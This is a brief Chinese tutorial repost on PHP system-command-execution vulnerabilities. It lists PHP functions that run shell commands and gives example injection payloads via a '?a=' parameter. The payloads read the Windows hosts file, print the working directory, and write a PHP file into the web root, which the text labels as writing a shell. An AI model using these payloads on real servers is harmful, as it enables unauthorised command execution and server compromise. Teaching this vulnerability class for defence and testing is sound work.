命令执行——系统命令执行(三)
生活随笔
收集整理的這篇文章主要介紹了
命令执行——系统命令执行(三)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
普及系統命令執行漏洞相關函數以及系統命令執行漏洞的利用
系統命令執行漏洞相關函數
允許系統命令執行的函數有
>system()
> exec()
代碼記得改
> shell exec()
>passthru()
> popen()
>右上角反-引號
懶得改系統命令執行漏洞的利用
系統命令執行漏洞有以下一些利用方式:
>?a=type c:\windows\system32\drivers\etc\hosts
查看文件
?a=cd
查看當前絕對路徑
>?a=echo "<?php phpinfo();?>">E:\xampp\htdocs\php\os\phpinfo.php
寫shell
總結
以上是生活随笔為你收集整理的命令执行——系统命令执行(三)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 命令执行——远程命令执行(二)
- 下一篇: 我人傻了,火狐坏了,重启系统删了重下都搞